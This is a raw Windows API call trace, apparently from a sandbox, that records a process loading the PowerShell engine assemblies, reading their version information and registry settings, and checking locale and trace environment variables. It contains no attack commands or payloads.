	[0855.386] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x1ec
	[0855.386] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x12d9a0 | out: lpdwProcessId=0x12d9a0) returned 0x440
	[0855.390] WerSetFlags () returned 0x0
	[0856.896] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0856.897] CoTaskMemFree (pv=0x0) 
	[0856.898] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dd08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dd00 | out: pulNumLanguages=0x12dd08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dd00) returned 1
	[0856.898] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dd08, pwszLanguagesBuffer=0x2be6d98, pcchLanguagesBuffer=0x12dd00 | out: pulNumLanguages=0x12dd08, pwszLanguagesBuffer=0x2be6d98, pcchLanguagesBuffer=0x12dd00) returned 1
	[0856.904] CoTaskMemAlloc (cb=0x24) returned 0x2df320
	[0856.904] GetUserDefaultLocaleName (in: lpLocaleName=0x2df320, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0856.904] CoTaskMemFree (pv=0x2df320) 
	[0856.933] CoTaskMemAlloc (cb=0x104) returned 0x246f50
	[0856.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.933] CoTaskMemFree (pv=0x246f50) 
	[0856.935] CoTaskMemAlloc (cb=0x104) returned 0x246f50
	[0856.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.938] CoTaskMemFree (pv=0x246f50) 
	[0856.940] CoTaskMemAlloc (cb=0x104) returned 0x246f50
	[0856.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.941] CoTaskMemFree (pv=0x246f50) 
	[0858.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0858.023] SetErrorMode (uMode=0x1) returned 0x1
	[0858.023] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12d980 | out: lpFileInformation=0x12d980*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0858.023] SetErrorMode (uMode=0x1) returned 0x1
	[0858.024] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dbf0 | out: lpdwHandle=0x12dbf0) returned 0x94c
	[0858.025] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bea628 | out: lpData=0x2bea628) returned 1
	[0858.026] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db68, puLen=0x12db60 | out: lplpBuffer=0x12db68*=0x2bea6c4, puLen=0x12db60) returned 1
	[0858.026] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea7a0, puLen=0x12dad0) returned 1
	[0858.026] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0858.026] CoTaskMemAlloc (cb=0x2e) returned 0x2de660
	[0858.026] lstrcpyW (in: lpString1=0x2de660, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0858.026] CoTaskMemFree (pv=0x2de660) 
	[0858.026] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea7f4, puLen=0x12dad0) returned 1
	[0858.026] lstrlenW (lpString="System.Management.Automation") returned 28
	[0858.026] CoTaskMemAlloc (cb=0x3c) returned 0x2984c0
	[0858.026] lstrcpyW (in: lpString1=0x2984c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0858.027] CoTaskMemFree (pv=0x2984c0) 
	[0858.027] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea850, puLen=0x12dad0) returned 1
	[0858.027] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0858.027] CoTaskMemAlloc (cb=0x20) returned 0x2df380
	[0858.027] lstrcpyW (in: lpString1=0x2df380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0858.027] CoTaskMemFree (pv=0x2df380) 
	[0858.027] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea890, puLen=0x12dad0) returned 1
	[0858.027] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0858.027] CoTaskMemAlloc (cb=0x44) returned 0x2984c0
	[0858.027] lstrcpyW (in: lpString1=0x2984c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0858.027] CoTaskMemFree (pv=0x2984c0) 
	[0858.027] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea8f8, puLen=0x12dad0) returned 1
	[0858.027] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0858.027] CoTaskMemAlloc (cb=0x76) returned 0x27f1c0
	[0858.027] lstrcpyW (in: lpString1=0x27f1c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0858.027] CoTaskMemFree (pv=0x27f1c0) 
	[0858.027] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea994, puLen=0x12dad0) returned 1
	[0858.027] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0858.027] CoTaskMemAlloc (cb=0x44) returned 0x2984c0
	[0858.027] lstrcpyW (in: lpString1=0x2984c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0858.027] CoTaskMemFree (pv=0x2984c0) 
	[0858.027] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea9f8, puLen=0x12dad0) returned 1
	[0858.027] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0858.027] CoTaskMemAlloc (cb=0x58) returned 0x2a4480
	[0858.027] lstrcpyW (in: lpString1=0x2a4480, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0858.027] CoTaskMemFree (pv=0x2a4480) 
	[0858.027] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2beaa74, puLen=0x12dad0) returned 1
	[0858.028] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0858.028] CoTaskMemAlloc (cb=0x20) returned 0x2df380
	[0858.028] lstrcpyW (in: lpString1=0x2df380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0858.028] CoTaskMemFree (pv=0x2df380) 
	[0858.028] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2bea71c, puLen=0x12dad0) returned 1
	[0858.028] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0858.028] CoTaskMemAlloc (cb=0x66) returned 0x2d3eb0
	[0858.028] lstrcpyW (in: lpString1=0x2d3eb0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0858.028] CoTaskMemFree (pv=0x2d3eb0) 
	[0858.028] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x0, puLen=0x12dad0) returned 0
	[0858.028] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x0, puLen=0x12dad0) returned 0
	[0858.028] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x0, puLen=0x12dad0) returned 0
	[0858.028] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12daa8, puLen=0x12daa0 | out: lplpBuffer=0x12daa8*=0x2bea6c4, puLen=0x12daa0) returned 1
	[0858.028] CoTaskMemAlloc (cb=0x204) returned 0x28d750
	[0858.028] VerLanguageNameW (in: wLang=0x0, szLang=0x28d750, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0858.028] CoTaskMemFree (pv=0x28d750) 
	[0858.028] VerQueryValueW (in: pBlock=0x2bea628, lpSubBlock="\\", lplpBuffer=0x12daf8, puLen=0x12daf0 | out: lplpBuffer=0x12daf8*=0x2bea650, puLen=0x12daf0) returned 1
	[0859.088] CoTaskMemAlloc (cb=0x104) returned 0x246f50
	[0859.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0859.088] CoTaskMemFree (pv=0x246f50) 
	[0859.093] CoTaskMemAlloc (cb=0x104) returned 0x246f50
	[0859.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0859.093] CoTaskMemFree (pv=0x246f50) 
	[0859.098] lstrlenW (lpString="䅁") returned 1
	[0859.111] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d9c8 | out: phkResult=0x12d9c8*=0x2e8) returned 0x0
	[0859.113] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d9b8 | out: phkResult=0x12d9b8*=0x2ec) returned 0x0
	[0859.113] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da48 | out: phkResult=0x12da48*=0x2f0) returned 0x0
	[0859.118] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d98c, lpData=0x0, lpcbData=0x12d988*=0x0 | out: lpType=0x12d98c*=0x1, lpData=0x0, lpcbData=0x12d988*=0x56) returned 0x0
	[0859.119] CoTaskMemAlloc (cb=0x5a) returned 0x2d3e40
	[0859.119] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d95c, lpData=0x2d3e40, lpcbData=0x12d958*=0x56 | out: lpType=0x12d95c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d958*=0x56) returned 0x0
	[0859.119] CoTaskMemFree (pv=0x2d3e40) 
	[0859.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0860.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0860.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0861.710] CoTaskMemAlloc (cb=0x104) returned 0x246f50
	[0861.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0861.710] CoTaskMemFree (pv=0x246f50) 
	[0866.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0866.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0868.454] CoTaskMemAlloc (cb=0x104) returned 0x229780
	[0868.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.454] CoTaskMemFree (pv=0x229780) 
	[0868.456] CoTaskMemAlloc (cb=0x104) returned 0x229780
	[0868.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.456] CoTaskMemFree (pv=0x229780) 
	[0868.944] CoTaskMemAlloc (cb=0x104) returned 0x229780
	[0868.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.944] CoTaskMemFree (pv=0x229780) 
	[0868.945] CoTaskMemAlloc (cb=0x104) returned 0x229780
	[0868.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.945] CoTaskMemFree (pv=0x229780) 
	[0868.946] CoTaskMemAlloc (cb=0x104) returned 0x229780
	[0868.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.946] CoTaskMemFree (pv=0x229780) 
	[0874.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0874.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0875.086] CoTaskMemAlloc (cb=0x104) returned 0x229780
	[0875.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.086] CoTaskMemFree (pv=0x229780) 
	[0875.090] CoTaskMemAlloc (cb=0x104) returned 0x229780
	[0875.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0875.090] CoTaskMemFree (pv=0x229780) 
	[0875.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0875.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0900.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0900.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0901.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0901.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0909.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0909.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0916.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0916.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0926.584] CoTaskMemAlloc (cb=0x104) returned 0x26fab0
	[0926.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x26fab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.584] CoTaskMemFree (pv=0x26fab0) 
	[0926.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0927.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0928.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0928.977] SetErrorMode (uMode=0x1) returned 0x1
	[0928.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12d920 | out: lpFileInformation=0x12d920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0928.978] SetErrorMode (uMode=0x1) returned 0x1
	[0963.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
